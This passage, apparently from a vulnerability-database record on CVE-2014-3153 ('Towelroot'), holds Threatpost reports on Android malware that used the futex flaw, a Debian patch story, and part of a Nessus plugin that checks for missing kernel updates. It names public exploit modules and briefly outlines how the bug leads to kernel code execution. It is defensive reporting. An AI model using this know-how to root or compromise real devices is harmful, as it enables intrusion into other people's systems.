"SAINT:58F657BC1DD46A0850A96857BC5FA43B", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_kernel_futex_requeue", "title": "Linux kernel futex_requeue privilege elevation", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:07", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "Researchers have identified a recent wave of malware targeting the Google Play app marketplace that entices users to download utilities and games that when installed surreptitiously root devices.\n\nThe exploit, which mobile security firm Lookout calls autorooting malware, gives attackers complete control of the infected device. It was discovered by researchers in an app called LevelDropper.\n\n\u201cLevelDropper, an app in the Google Play Store that we determined to be malicious, is the latest example of a new and persisting trend in mobile threats: autorooting malware,\u201d wrote Colin Streicher, with Lookout\u2019s research and response team [in a blog posted Monday](<https://blog.lookout.com/blog/2016/06/27/leveldropper/>).\n\nLookout did not indicate what versions of the Android OS is vulnerable to LevelDropper.\n\nStreicher said once installed, LevelDropper, an app that gauged a horizontal plane with a simulated air bubble, quietly jailbreaks or roots the targeted Android phone or tablet. Next, with escalated privileges, attackers can remotely install additional applications without the target\u2019s knowledge.\n\n\u201cImmediately after running LevelDropper, we noticed that the Location Services window popped up blank. This is a significant red flag,\u201d Streicher wrote. Worse, after just 30 minutes being attacked, the attacker had silently installed 14 applications with no user interaction.\n\n[![Credit: Lookout](https://media.threatpost.com/wp-content/uploads/sites/103/2016/06/06235033/LevelDropper_Lookout.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/06/06235033/LevelDropper_Lookout.png>)\n\nCredit: Lookout\n\nUpon closer examination of the device\u2019s System Directory, researchers said, there were no overt signs that the Android device had been rooted. \u201cUsually we would see a superuser binary and often a rewritten \u201cinstall-system-recovery\u201d script, which is used to ensure that root access survives upgrades.\u201d\n\nLevelDropper is just the latest in a wave of similar type autorooting malware to hit the Google Play store. Lookout said Google has recently given the boot to Brain Test, ShiftyBug, Shuanet, and Shedun that each bundled the autoroot exploit. As with these others, LevelDropper was also pulled from the Google Play marketplace.\n\nWith LevelDropper, the attacker\u2019s intent appears to be to drive ad revenues.\n\n\u201cIn cases like this, developers often integrate auto-rooting functionality to drive app installs which can drive both perceived popularity and ad revenue,\u201d Streicher explains. In the case of the autorooting malware sample called Brain Test the attackers went so far as to hijacks the victim\u2019s phone in order to post positive reviews of similar autorooting malware-laced games, he wrote.\n\nRoot exploits are not new and trace back to 2011 with the reported GingerMaster exploit that targeted Android 2.3 and gave attackers complete control over infected devices. [That malware](<https://threatpost.com/gingermaster-malware-seen-using-root-exploit-android-gingerbread-081811/75559/>), also packaged in infected apps, collected data on the user and downloaded and installed apps on its own, without the user\u2019s permission. More recently, in April, Blue Coat security researchers observed a weaponized version of the Towelroot jailbreaking utility used in tandem with [ransomware attacks against Android device users.](<https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/>)\n\nAccording to a [2014 report by Lacoon Mobile Security,](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>) Android root access vulnerabilities affect most devices. The exploit is tied to a vulnerability in version 3.14.5 of the Linux kernel. The firm called the bug \u201cTowelroot,\u201d because it is the same vulnerability (CVE-2014-3153) exploited in the latest Android rooting tool developed by the hacker George Hotz.\n", "modified": "2016-06-28T16:29:57", "published": "2016-06-28T12:29:57", "id": "THREATPOST:B433923D1E04E82EB6DD30772F192222", "href": "https://threatpost.com/google-play-hit-with-rash-of-auto-rooting-malware/118938/", "type": "threatpost", "title": "Google Play Hit With Rash of Auto-Rooting Malware", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:39", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A recently disclosed [vulnerability in version 3.14.5 of the Linux kernel](<http://threatpost.com/debian-urging-users-patch-linux-kernel-flaw/106516>) is also present in most versions of Android and could give attackers the ability to acquire root access on affected devices.\n\nResearchers at Lacoon Mobile Security are calling the bug \u201cTowelRoot,\u201d because it is the very same vulnerability (CVE-2014-3153) exploited in the latest Android rooting tool developed by George Hotz (Geohot). Successful exploitation of the Linux bug within the Android operating system would give the attacker administrative access to a victim\u2019s phone. Specifically, such access could potentially allow that same attacker to run further malicious code, retrieve files and device data, bypass third-party or enterprise security applications including containers like Samsung\u2019s secure Knox sub-operating system, and establish backdoors for future access on victim devices.\n\n[Jeff Forristal](<http://threatpost.com/android-master-key-malware-emerged-before-official-patch-details>), the chief technology officer at the mobile security firm Bluebox Security, explained to Threatpost in an interview that the Linux futex vulnerability affects Android devices because those devices run on the Linux kernel, and once the bug became public, it was only a matter of time before someone developed an Android-specific exploit for it. George Hotz, a well-known figure in the jailbreaking and rooting scene, took that next step.\n\n\u201cThis is pretty common practice/recipe in the Android rooting scene: they wait for a general-purpose Linux kernel vulnerability to surface, then they race to create an Android-specific exploit for it that can root the device,\u201d Forristal said.\n\nThis vulnerability exists in Android version 4.4 and earlier, and is therefore present on nearly every commercial build, including the wildly popular Samsung Galaxy S5, according to [research from Lacoon Mobile Security](<http://www.lacoon.com/blog/2014/06/towelroot-gives-root-access-samsung-galaxy-s5-popular-android-devices/>). Other vulnerable devices are said to include the Samsung Note 3, LG G Flex, the Motorola RAZR HD/M and Razr Maxx HD, and the Sony Xperia E1, C6603, C5303, Xperia T, Xperia z1, and Xperia SP among others.\n\n\u201cThe vulnerability is currently codenamed TowelRoot after a rooting tool that was released on mobile forums that uses the vulnerability to root most of the popular mobile devices on the market,\u201d writes Ohad Bobrov, Lacoon Security\u2019s vice president of research and development. \u201cThis tool is being widely publicized and is easily available for use without the need for technical know-how.\u201d\n\nIn an email interview, Michael Shaulov, the CEO of Lacoon, explained that in the case of secure Samsung Knox environments, the exploit would trigger protection and issue an alert to users, but that, ultimately, the attacker could still gain root access.\n\n\u201cRight now this vulnerability is only used by the rooting tool and has yet to show up in any malicious sample,\u201d explains Bobrov. \u201cLearning from the past, we can assume that it is only a matter of time until exploits for this vulnerability are distributed through other channels.\u201d\n\nIn order to gain root access to a victim\u2019s phone using this vulnerability, an attacker would need to craft an exploit and package it within a malicious application. Because of this, users that avoid third-party markets and avoid following shady links or clicking on suspicious attachments should be immune.\n\n\u201cThe risk of this particular Linux kernel bug, as realized on an Android device, is that unprivileged generic Android apps with malicious intent can also exploit the same kernel vulnerability for other evil (non-root) reasons,\u201d Forristal said. \u201cThis has absolutely nothing to do with TowelRoot or rooting in general \u2014 it\u2019s just a callout that this time around it\u2019s a very general-purpose security risk that is relevant regardless of the device owner\u2019s rooting proclivities.\u201d\n", "modified": "2014-06-18T17:21:03", "published": "2014-06-17T10:47:45", "id": "THREATPOST:42E64B8A7AF8DD130DE81078204DEE28", "href": "https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/", "type": "threatpost", "title": "Android Root Access Vulnerability Affecting Most Devices", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:27", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A family of Android malware was so successful that at its peak, over the course of two months last year, it infected 14 million devices and rooted more than half of them, roughly eight million devices.\n\nResearchers said early Tuesday the strain of malware, dubbed CopyCat, helped its authors earn $1.5 million \u2013 primarily through ad fraud \u2013 from April to May 2016.\n\nResearchers with Check Point\u2019s Mobile Research Team, who found the malware in March this year, claim CopyCat mostly infected Android users in Southeast Asia, but that upwards to 280,000 U.S. Android users were also infected. According researchers, Asia accounted for 55 percent of CopyCat infections. Africa, at 18 percent, accounted for the second highest number of infected devices.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/07/06223810/Screen-Shot-2017-07-06-at-12.39.15-PM-1024x680.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/07/06223810/Screen-Shot-2017-07-06-at-12.39.15-PM.png>)\n\nThe malware never made it to Google\u2019s Play marketplace, but did spread via popular apps, which were repackaged with CopyCat and available for download on third-party app stores.\n\nThe malware lingers until the infected device is restarted; once that happens, it downloads a series of exploits from an Amazon S3 bucket and attempts to root the device.\n\n\u201cIf successful, CopyCat installs another component to the device\u2019s system directory, an activity which requires root permissions, and establishes persistency, making it difficult to remove,\u201d the researchers [wrote Thursday](<http://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/>).\n\nOnce in, the malware targets Zygote, an Android core process that launches apps and if exploited, essentially grants attackers admin privileges.\n\nTriada, an Android Trojan uncovered by [Kaspersky Lab](<https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/>), and later by Check Point [in 2016](<https://threatpost.com/aggressive-triada-horde-variants-up-mobile-malware-threat/118767/>), previously used this technique. Kaspersky Lab\u2019s Anton Kivva, a malware analyst with the company, said in June that year Triada was infecting Zygote, obtaining super-user privileges, and using Linux debugging tools to embed a malicious DLL to target mobile browsers.\n\nResearchers at Check Point claim that with the CopyCat malware, attackers have taken a shine to injecting code into the Zygote process to get credit for fraudulently installed apps on the device by swapping out referrer IDs for legitimate apps with their own. The malware also displays fake ads and installs fake apps, two additional methods of generating capital for the attacker.\n\nResearchers were able to get a better idea exactly what attackers were doing to victim\u2019s devices by looking through one of the malware\u2019s command-and-control servers. Daniel Padon, a mobile threat researcher with Check Point told Threatpost Thursday researchers have the data from a C+C going back more than a year. Between April and May 3.8 million of the devices were being served fake ads while 4.4 million other devices were being used to steal credit for installing apps on Google Play, the firm claims.\n\nThe bulk of the exploits CopyCat used to root the eight million devices are years old, according to Check Point. Four of them were from 2014, one was even from 2013, suggesting victims either didn\u2019t patch their devices, or patched infrequently.\n\nOne of the exploits, Towelroot (CVE-2014-3153) was behind a scourge of auto-rooting malware [this time last summer](<https://threatpost.com/google-play-hit-with-rash-of-auto-rooting-malware/118938/>) and a wave of Android ransomware attacks [in April of that year](<https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/>) that targeted outdated systems.\n\nResearchers are unclear who exactly is behind CopyCat but note there are several connections to MobiSummer, an ad network based in China. It\u2019s possible the attackers simply used the network\u2019s code and infrastructure however.\n\nCheck Point says Google, which it informed of CopyCat in March \u2013 shortly after it discovered the malware \u2013 has been able to \u201cquell the campaign\u201d over the past year.\n\nWhen reached by Threatpost on Thursday a spokesperson for Google said the company has been familiar with CopyCat \u2013 malware it says is a variant of a larger, undisclosed malware family its monitored since 2015.\n\n\u201cEach time a new variant appears, we update our detection systems to protect our users. Play Protect secures users from the family, and any apps that may have been infected with CopyCat were not distributed via Play. As always, we appreciate researchers\u2019 efforts to help keep users safe,\u201d Google said.\n\nGoogle introduced Play Protect, a service that scans previously downloaded apps to ensure they\u2019re safe from malicious components, [in May](<https://threatpost.com/android-gets-security-makeover-with-google-play-protect/125781/>) at Google I/O.\n\nPadon told Threatpost the malware demonstrated a number of new techniques, and that as far as he knew, wasn\u2019t connected to another family.\n\n\u201cWe didn\u2019t manage to affiliate this malware with any other known family,\u201d Padon said, \u201cIt also presents a lot of new techniques which were never seen before. If Google does come up with a name it will be interesting to know.\u201d\n\nCopyCat joins the ranks of other Android malware strains previously discovered by Check Point, like HummingBad and Gooligan. [Gooligan](<https://threatpost.com/gooligan-malware-breaches-1-million-google-accounts/122195/>) was blamed for the breach of 1 million Google accounts this past December. HummingBad, [disclosed by the firm last July](<https://threatpost.com/chinese-ad-firm-raking-in-300k-a-month-through-adfraud-android-malware/119030/>), reportedly raked in $300,000 a month for its authors via adfraud. Both families of malware installed adware on infected handsets in order to generate revenue.\n", "modified": "2017-07-06T17:49:02", "published": "2017-07-06T13:49:02", "id": "THREATPOST:A1F7D2E70C26FAAFD6D382A08D8D7B38", "href": "https://threatpost.com/copycat-malware-infected-14m-android-devices-rooted-8m-in-2016/126691/", "type": "threatpost", "title": "CopyCat Malware Infected 14M Android Devices, Rooted 8M, in 2016", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:25", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153"], "description": "A menacing wave of ransomware that locks up Android devices and demands victims pay $200 in Apple iTunes gift card codes is raising concern among security researchers. The ransomware attacks, they say, open a new chapter for Android vulnerabilities similar to Microsoft\u2019s obsolete, unpatched and unsupported Windows XP operating system.\n\n\u201cThis is a new and troubling development for the Android OS. This ransomware thrives on outdated Android devices that are not patched and will likely never be,\u201d said Andrew Brandt, researcher at Blue Coat and the analyst who discovered the vulnerability.\n\nHe said the ransomware attacks Android 4.x operating systems, predominantly used in 2012 to 2013. That version of the Android OS is still in use by approximately 60 percent of Android devices around the world, [according to Google\u2019s own internal estimates](<https://developer.android.com/about/dashboards/index.html>). And just as Microsoft stopped patching Windows XP, Google is highly unlikely to patch a 5-year-old OS, Brandt said.\n\n\u201cWhat we have here is a fully operational operating system which no longer receives updates,\u201dBrandt said. \u201cUsers are in danger of infection just by using it. Having things installed without any user interaction until it\u2019s too late is a pretty scary new development in Android threats,\u201d Brandt said.\n\nBrandt told Threatpost that the ransomware utilizes a three-prong attack. First, it uses the drive-by lbxslt exploit embedded in ads to penetrate users of the Android versions 4.0.3 and 4.4.4\u2019s default browsers. So far, the malicious ads are targeting porn websites.\n\nAttackers are using the lbxslt exploit, Brandt said, which was stolen from Hacking Team in July of last year. But Brandt said, the authors appear to be using an updated version of lbxslt that infects a larger range of Android 4.x OS devices compared to earlier versions.\n\nPhase two, Brandt said, is installing a weaponized version of the Towelroot jailbreaking utility. Used in the past by non-technical users, Towelroot is a once popular single-click Android rooting tool for Samsung Galaxy handsets and other Android devices running Android 4.4.2, according to Khang Nguyen, security researcher, at Duo Security.\n\nTowelroot, said Nguyen, is an exploit for ([CVE-2014-3153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3153>)) a vulnerability that affected the Linux kernel through 3.14.5. CVE-2014-3153 was discovered by comex (Nicholas Allegra) and the first exploit based on Towelroot written by well-known hacker geohot (George Hotz). This is not the first public Towelroot exploit, but it\u2019s likely the first drive-by malware attack using a weaponized version of Towelroot, Nguyen said.\n\nThe use of Towelroot is twofold. The first, Brandt said, is that Towelroot suppresses the normal pop-up permissions window on Android that appears when you install programs from Google Play. \u201cAll installs are silent and in the background,\u201d he said.\n\nUnder that cloak of indiscernibility, criminals use the compromised Android machines to download the ransomware called Cyber.Police. This is non-crypto ransomware that displays a note that vaguely looks like an official warning targeting visitors of porn websites stating: \u201cAll actions are illegal, are fixed. History query stored in the database of the U.S. Department of Homeland Security.\u201d Attackers claim to be either \u201cAmerican national security agency\u201d or \u201cnation security agency\u201d.\n\n\u201cThe ransomware doesn\u2019t threaten to (or actually) encrypt the victim\u2019s data. Rather, the device is held in a locked state where it cannot be used for anything other than delivering payment to the criminals in the form of two $100 Apple iTunes gift card codes,\u201d Brandt wrote in a research note.\n\nVictims who opt to pay the ransom to unlock their phone are directed to pay a \u201cfine\u201d between $100 and $200 to a \u201ctreasury account\u201d via submitting an iTunes gift card codes. Use of iTunes gift cards for ransomware payments is unusual given Bitcoin payments have been preferred untraceable forms of payment for crypto-ransomware attackers for over a year now.\n\nBrandt said the easiest and most effective way to remove the ransomware is to restore the Android device to its original factory default software.\n\n\u201cWhen we executed the application\u2026, we learned that the malware\u2019s internal name for itself is \u201cnet.prospectus\u201d and engages in the sorts of behavior we\u2019ve come to expect from ransomware: It kills all other apps; prevents other apps from launching or stopping the ransomware,\u201d Brandt wrote. \u201cIt sets itself up to be the first thing to start at boot time; profiles the infected device; and communicates with a command-and-control server.\u201d\n\nThe best way to mitigate this vulnerability is to use a device that runs a more recent version of Android than the Android 4 family of operating systems, Nguyen said. Blue Coat recommends keeping a fresh device backup somewhere other than on your phone or tablet\u2019s internal memory or memory card. \u201cThat way, you can just perform a factory reset and not worry about losing anything other than the time it takes to reconfigure and reinstall your mobile device\u2019s apps,\u201d Brandt said.\n", "modified": "2016-04-25T19:36:33", "published": "2016-04-25T15:36:33", "id": "THREATPOST:DF79B36E4B10187B12FB82AEF22C5EA9", "href": "https://threatpost.com/android-ransomware-attacks-using-towelroot-hacking-team-exploits/117655/", "type": "threatpost", "title": "Android Ransomware Attacks Using Towelroot, Hacking Team Exploits", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:05", "bulletinFamily": "info", "cvelist": ["CVE-2014-3153", "CVE-2015-1805"], "description": "The Google Play Protect team said it identified a new strain of Android spyware called Tizi found inside several apps previously available via the Google Play marketplace. The recent discovery triggered a wider investigation by Google who said apps infected by the Tizi malware date back to 2015.\n\nRecent samples of Tizi allowed an attacker to root a targeted device and steal sensitive data from apps such as Facebook, Twitter, WhatsApp, Viber, Skype, LinkedIn and Telegram. Specific geographies targeted were Kenya, Nigeria and Tanzania, Google said. A smaller number of victims resided in the United States, researchers said.\n\n\u201cThe backdoor contains various capabilities common to commercial spyware, such as recording calls from WhatsApp, Viber, and Skype; sending and receiving SMS messages; and accessing calendar events, call log, contacts, photos, Wi-Fi encryption keys, and a list of all installed apps,\u201d researchers wrote in a [Google Security Blog post on Monday](<https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html>).\n\nThe Tizi malware can also record ambient audio via the phone\u2019s microphone and silently take pictures with no on-screen notifications alerting the phone\u2019s owner.\n\n\u201cSubsequent command-and-control communications are normally performed over regular HTTPS, though in some specific versions, Tizi uses the MQTT messaging protocol with a custom server,\u201d Google said.\n\nGoogle Play Protect team said it discovered the spyware in September 2017, with the oldest sample dating back to October 2015. \u201cThe early Tizi variants didn\u2019t have rooting capabilities or obfuscation, but later variants did,\u201d researchers wrote.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2017/11/06222051/Google_Infections_Tizi-300x249.png)](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/11/06222051/Google_Infections_Tizi.png>)In total, Google said it identified 1,300 devices affected by Tizi.\n\nInitially Tizi was discovered on a workout app \u201ccom.dailyworkout.tizi\u201d that was promoted via social media and meant to appeal to fans of the Kenyan fitness brand Tizi. \u201cThe Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites,\u201d Google said. Other Tizi-laced apps (com.press.nasa.com.tanofresh and com.system.update.systemupdate) were also found.\n\nResearchers said attackers mostly targeted users with older model Android phones running older chipsets and past versions of the Android OS. Targeted handsets did not have the most recent security patches from Google and were vulnerable to one of nine vulnerabilities that ranged from the Linux kernel vulnerability \u201cTowelRoot\u201d ([CVE-2014-3153](<https://threatpost.com/android-root-access-vulnerability-affecting-most-devices/106683/>)) to a rooting vulnerability ([CVE-2015-1805](<https://threatpost.com/google-patches-old-flaw-exploited-by-rooting-application/117161/>)) patched in 2014.\n\nAndroid devices with patch levels later than April 2016 are less exposed to Tizi\u2019s capabilities, researchers wrote.\n\n\u201cIf a Tizi app is unable to take control of a device because the vulnerabilities it tries to use are all patched, it will still attempt to perform some actions through the high level of permissions it asks the user to grant to it, mainly around reading and sending SMS messages and monitoring, redirecting, and preventing outgoing phone calls,\u201d wrote the Google Play Protect team.\n\nThis past year Google has made strides to shore up the Android ecosystem, from the Google Play marketplace to devices themselves.\n\nIn May, Google introduced Play Protect, a new security feature that maintains some oversight on content downloaded to Android devices. For example, previously downloaded apps can be continually scanned for malicious behaviors as a counter to developers who push benign apps to Google Play that later connect and download malicious components. This also helps provide a line of defense against apps downloaded from third-party stores that aren\u2019t subject to Google\u2019s malware scanners. Google said in May that Play Protect will be capable of scanning and verifying up to 50 billion apps on a daily basis.\n\nDespite those gains, reports of malware making it into Google\u2019s marketplace continue.\n\nEarlier this month Google [removed a phony adware-laced WhatsApp download](<https://threatpost.com/1m-downloads-later-google-pulls-phony-whatsapp-from-google-play/128778/>) from Google Play that was downloaded more than one million times. In March, Google booted more than a dozen apps from the Google Play store after [researchers discovered](<https://threatpost.com/adware-apps-booted-from-google-play/124549/>) each were rip-offs of legitimate apps and designed to aggressively push ads on Android devices. In August, [three messaging apps in the Google Play store](<https://threatpost.com/apps-infected-with-sonicspy-spyware-removed-from-google-play/127406/>) contained spyware called SonicSpy were also removed. And most recently, a flashlight app snuck BankBot malware into the Google Play store that stole banking credentials from victims.\n", "modified": "2017-11-28T12:40:09", "published": "2017-11-28T12:40:09", "id": "THREATPOST:5E0275127CA36073D1FD4B8A32CAADD6", "href": "https://threatpost.com/google-detects-and-boots-tizi-spyware-off-google-play/129012/", "type": "threatpost", "title": "Google Detects and Boots Tizi Spyware Off Google Play", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:42", "bulletinFamily": "info", "cvelist": ["CVE-2014-3144", "CVE-2014-3145", "CVE-2014-3153"], "description": "Several vulnerabilities have been patched in the Linux kernel that could have led to a denial of service or privilege escalation.\n\nDebian, which distributes versions of Linux for personal computers and network servers, warned about the vulnerabilities [yesterday in a security update](<https://lists.debian.org/debian-security-announce/2014/msg00130.html>).\n\nThe most concerning issue (CVE-2014-3153) involves the futex subsystem and could let an attacker with local access perform unauthorized actions. According to LWN.net, the futux mechanism is a \u201c[fast, lightweight kernel-assisted locking primitive for user-space applications.](<http://lwn.net/Articles/360699/>)\u201d The local user could gain ring 0 control via the futex system call.\n\n\u201cAn unprivileged user could use this flaw to crash the kernel (resulting in denial of service) or for privilege escalation,\u201d the advisory said.\n\nAs futex tends to be available within most Linux sandboxes, some experts are viewing it as an especially urgent to fix issue.\n\nKees Cook, a ChromeOS security researcher and former Ubuntu Security Engineer wrote [Thursday on Seclists.org](<http://seclists.org/oss-sec/2014/q2/469>).\n\n\u201cThe futex syscall can leave a queued kernel waiter hanging on the stack. By manipulating the stack with further syscalls, the waiter structure can be altered. When later woken up, the altered waiter can result in arbitrary code execution in ring 0,\u201d Cook said when explaining the bug.\n\nPinkie Pie, the anonymous teenage researcher who famously produced a sandbox escape against Chrome when he [chained together six individual vulnerabilities in 2012](<http://threatpost.com/google-fixes-second-set-chrome-bugs-used-pwnium-contest-031212>), was credited with discovering the futex issue.\n\nPinkie Pie of course has proved more than adept at finding additional bugs in [Chrome](<http://threatpost.com/pinkiepie-strikes-again-compromises-google-chrome-pwnium-contest-hack-box-101012>) and [Chrome OS ](<http://threatpost.com/google-serves-half-slice-pwnium-cash-pinkie-pie-031913/77639>)\u2013 many of them sandbox exploits \u2013 at both Pwnium and Pwn2Own competitions over the last few years.\n\nAnother issue (CVE-2014-3144/CVE-2014-3145) where-in a local user could also cause a DoS situation via BPF instructions, was also fixed yesterday.\n\nDebian is encouraging Linux users to upgrade their packages and points out that the issue has been fixed in the stable distribution, version 3.2.57-3+deb7u2, and will be fixed in the unstable distribution soon.\n\nA bug similar to the futex one \u2013 [one that apparently existed for five years](<http://threatpost.com/five-year-old-security-vulnerability-patched-in-linux-kernel/106104>) \u2013 was patched last month in Linux kernel. A problem with the \u201cn_tty_write function\u201d could have let local users cause denial of service attacks, gain privileges or run malicious code.\n", "modified": "2014-06-06T17:40:34", "published": "2014-06-06T13:40:34", "id": "THREATPOST:B4267D45B883F6975BE2834CBA5C5B48", "href": "https://threatpost.com/debian-urging-users-patch-linux-kernel-flaw/106516/", "type": "threatpost", "title": "Pinkie Pie Linux Kernel Patch Available", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-17T12:49:27", "description": "Description of changes:\n\n[2.6.39-400.215.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}", "edition": 21, "published": "2014-06-09T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3038)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3153"], "modified": "2014-06-09T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3038.NASL", "href": "https://www.tenable.com/plugins/nessus/74377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3038.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74377);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3153\");\n script_bugtraq_id(67906);\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3038)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.215.2.el6uek]\n- futex: Make lookup_pi_state more robust (Thomas Gleixner) [Orabug: \n18918614] {CVE-2014-3153}\n- futex: Always cleanup owner tid in unlock_pi (Thomas Gleixner) \n[Orabug: 18918614] {CVE-2014-3153}\n- futex: Validate atomic acquisition in futex_lock_pi_atomic() (Thomas \nGleixner) [Orabug: 18918614] {CVE-2014-3153}\n- futex: Forbid uaddr1 == uaddr2 in futex_requeue(..., requeue_pi=1) \n(Thomas Gleixner) [Orabug: 18918614] {CVE-2014-3153} {CVE-2014-3153}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004175.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-June/004176.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android \"Towelroot\" Futex Requeue Kernel Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) 